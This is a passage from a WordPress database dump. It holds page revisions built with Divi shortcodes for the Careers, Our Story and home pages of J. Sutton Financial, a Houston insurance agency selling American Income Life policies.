background_layout=\"dark\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||178px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"https://www.ariasagencies.com/products-services/\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" global_colors_info=\"{}\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-02 19:18:02','2023-04-02 19:18:02','',38,'http://cmdev-site1.com/?p=628',0,'revision','',0),(629,1,'2023-04-02 19:18:13','2023-04-02 19:18:13','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][dsm_text_divider header=\"Careers\" color=\"#003372\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" hover_enabled=\"0\" global_colors_info=\"{}\" animation_style=\"slide\" animation_direction=\"right\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Products & Services\" color=\"#FFFFFF\" divider_weight=\"5px\" text_gap=\"15px\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" background_layout=\"dark\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||178px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"https://www.ariasagencies.com/products-services/\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" global_colors_info=\"{}\" custom_margin=\"-46px|||||\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-02 19:18:13','2023-04-02 19:18:13','',38,'http://cmdev-site1.com/?p=629',0,'revision','',0),(630,1,'2023-04-02 19:18:48','2023-04-02 19:18:48','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\"][dsm_text_divider header=\"Careers\" color=\"#003372\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" hover_enabled=\"0\" global_colors_info=\"{}\" animation_style=\"slide\" animation_direction=\"right\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Products & Services\" color=\"#FFFFFF\" divider_weight=\"5px\" text_gap=\"15px\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" background_layout=\"dark\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_margin=\"-1px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" alt=\"umbrella\" title_text=\"Umbrella Roll in Icon\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|||193px||\" custom_padding=\"|0px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Life Insurance\" badges_text=\"Policies\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_orientation=\"center\" custom_margin=\"|||178px||\" link_option_url=\"https://www.ailife.com/products\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Contract-Icon-Grey-Background.png\" alt=\"secure contract icon\" title_text=\"Contract Icon Grey Background\" align=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"50%\" custom_margin=\"|170px||||\" global_colors_info=\"{}\"][/et_pb_image][dsm_text_badges main_text=\"Policyholder Services\" badges_background_color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|||97px||\" link_option_url=\"https://www.ailife.com/manage-my-policy\" global_colors_info=\"{}\"][/dsm_text_badges][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" custom_margin=\"||66px||false|false\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta button_url=\"https://www.ariasagencies.com/products-services/\" button_text=\"Request an agent today!\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_color=\"off\" custom_button=\"on\" button_text_color=\"#FFFFFF\" button_bg_color=\"#666666\" button_border_width=\"0px\" button_border_radius=\"14px\" background_layout=\"light\" global_colors_info=\"{}\" custom_margin=\"-46px|||||\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-02 19:18:48','2023-04-02 19:18:48','',38,'http://cmdev-site1.com/?p=630',0,'revision','',0),(633,1,'2023-04-02 19:20:26','2023-04-02 19:20:26','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Confrence-Room-2-Black-White-Muted-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"33px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"||66px|||\" global_colors_info=\"{}\" custom_margin=\"66px|auto||auto||\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Our Story\" color=\"#FFFFFF\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#FFFFFF\" header_font_size=\"30px\" hover_enabled=\"0\" global_colors_info=\"{}\" background_layout=\"dark\" sticky_enabled=\"0\"][/dsm_text_divider][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"1px|auto|66px|auto||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||||false|false\" custom_padding=\"0px||||false|false\" global_colors_info=\"{}\"]<p class=\"font_7\"><span>J. Sutton Financial was founded in 2022 with a vision to extend career opportunities beyond its home city.</span></p>\n<p class=\"font_7\"><span>We service clients and work as a team </span><span style=\"font-size: 14px;\">at our home office in Houston as well as 100% remote. This allows us to not only have an incredible office culture but also service more clients with an agent reach from coast-to-coast.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance Company</h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" global_colors_info=\"{}\"]<p>American Income Life is an international company protecting working families in the United States, Canada, New Zealand, and through their wholly-owned subsidary, National Income Life Insurance Company in New York. American Income Life has served working class families since 1951 with life, accident, and supplemental health products to help protect members of labor unions, credit unions, associations, and their families. AIL representatives develop long-term relationships with clients and meet them where they are most comfortable...their home. </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"66px|auto|66px|auto||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life at a Glance</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<ul>\n<li>Headquartered in Waco, Texas</li>\n<li>Life, accident, and supplemental health insurance</li>\n<li>Portable insurance coverage — if you move or change jobs, our insurance coverage stays with you</li>\n<li>Individual, single parent, and family policies available</li>\n</ul>\n<p><em>*This rating refers only to the financial strength of the company and is not a recommendation of the specific policy provisions, rates, or practices of the insurance company.</em></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" header_2_text_color=\"#003372\" global_colors_info=\"{}\"]<h2>American Income Life\'s Parent Company</h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>American Income Life is a wholly-owned subsidiary of Globe Life Inc (NYSE: GL), an S&amp;P 500 Company that markets life and supplemental health insurance for middle-income families through its affiliate companies.</p>\n<p>Globe Life is proudly the official life insurance company of the Dallas Cowboys &amp; owns the naming rights to Globe Life Park, home of the Texas Rangers.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Our Story','','inherit','closed','closed','','26-revision-v1','','','2023-04-02 19:20:26','2023-04-02 19:20:26','',26,'http://cmdev-site1.com/?p=633',0,'revision','',0),(635,1,'2023-04-02 19:30:53','2023-04-02 19:30:53','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_typing_effect _builder_version=\"4.20.2\" _module_preset=\"default\" typing_effect=\"How much insurance do you need?\" before_text_align=\"center\" header_level=\"h2\" header_text_align=\"center\" hover_enabled=\"0\" sticky_enabled=\"0\" typing_speed=\"150ms\"][/dsm_typing_effect][dsm_button _builder_version=\"4.20.2\" _module_preset=\"default\" button_one_text=\"Get a quote today!\" button_alignment=\"center\" background_layout=\"dark\" custom_button_one=\"on\" button_one_text_color=\"#ffffff\" button_one_bg_color=\"#003372\" button_one_bg_enable_color=\"on\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" hover_enabled=\"0\" sticky_enabled=\"0\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" box_shadow_style_button_one=\"preset2\" animation_style=\"fold\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(224,219,219,0.39)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" 